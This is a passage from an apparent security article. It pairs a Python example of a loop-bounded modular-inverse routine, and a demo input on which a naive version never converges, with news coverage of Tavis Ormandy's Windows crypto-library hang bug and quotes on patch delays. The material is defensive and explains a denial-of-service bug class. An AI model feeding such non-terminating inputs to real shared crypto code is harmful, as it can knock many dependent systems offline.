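    so the loop needs O(bit_length(m)) steps; exceeding the budget is a bug."""
    if m < 3 or m % 2 == 0:
        raise ValueError("modulus must be odd and greater than 2")
    a %= m
    if a == 0 or gcd(a, m) != 1:
        raise ValueError("no inverse exists: gcd(a, m) != 1")
    budget = 4 * m.bit_length() + 8
    u, v, x1, x2 = a, m, 1, 0
    while u != 1 and v != 1:
        while u % 2 == 0:
            u, x1, budget = u // 2, _halve_mod(x1, m), budget - 1
            if budget < 0:
                raise RuntimeError("modular inverse did not converge")
        while v % 2 == 0:
            v, x2, budget = v // 2, _halve_mod(x2, m), budget - 1
            if budget < 0:
                raise RuntimeError("modular inverse did not converge")
        if u >= v:
            u, x1 = u - v, x1 - x2
        else:
            v, x2 = v - u, x2 - x1
        budget -= 1
        if u == 0 or v == 0 or budget < 0:
            raise RuntimeError("modular inverse did not converge")
    return x1 % m if u == 1 else x2 % m


if __name__ == "__main__":
    print("naive 3^-1 mod 7  ->", binary_modinv_naive(3, 7))
    print("naive 3^-1 mod 9  ->", binary_modinv_naive(3, 9), "(loop never converged)")
    print("safe  3^-1 mod 7  ->", safe_modinv(3, 7))
    try:
        safe_modinv(3, 9)
    except ValueError as exc:
        print("safe  3^-1 mod 9  -> rejected:", exc)
```

The practitioner's takeaway is the shape of the fix rather than the arithmetic: a routine that consumes numbers from untrusted input (certificates, signatures, key exchange messages) must either prove its loop terminates for every input or carry an explicit bound and a failure path, because a library-level hang in shared crypto code takes down every caller at once, exactly the amplification Ormandy describes.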

Ormandy noted that while it is a low-severity bug, it would be possible to take down an entire Windows fleet relatively quickly if exploited. “Microsoft has a customer commitment to investigate reported security issues and provide updates as soon as possible. We worked to meet the researcher’s deadline for disclosure; however, a customer-impacting regression was discovered that prevented the update from being released on schedule. We advised the researcher of the delay as soon as we were able. Developing a security update is a delicate balance between timeliness and quality, and our ultimate goal is to help ensure maximum customer protection with minimal customer disruption," a Microsoft spokesperson wrote in an email.*  

"This finding demonstrates just how important this type of research is in helping organizations mitigate risks no one ever knew existed. The frightening part about this vulnerability and others that can be remedied with a simple patch, however, is that many organizations will have a very difficult time actually implementing the fix,” said Adam Laub, SVP product management, STEALTHbits Technologies.

“When I first started in the industry nearly 15 years ago, patch management was very much the flavor of the day – much like privileged access management (PAM) and artificial intelligence (AI) technologies command significant mind share among security practitioners now. Sadly, the patch management problem persists despite advances in so many other areas of IT management, which could make this 'low severity' vulnerability a lot more pungent than it ought to be."

*June 12, 2019 3:38 PM: This article was updated to include comment from a Microsoft spokesperson.

Categories: Cyber Risk News
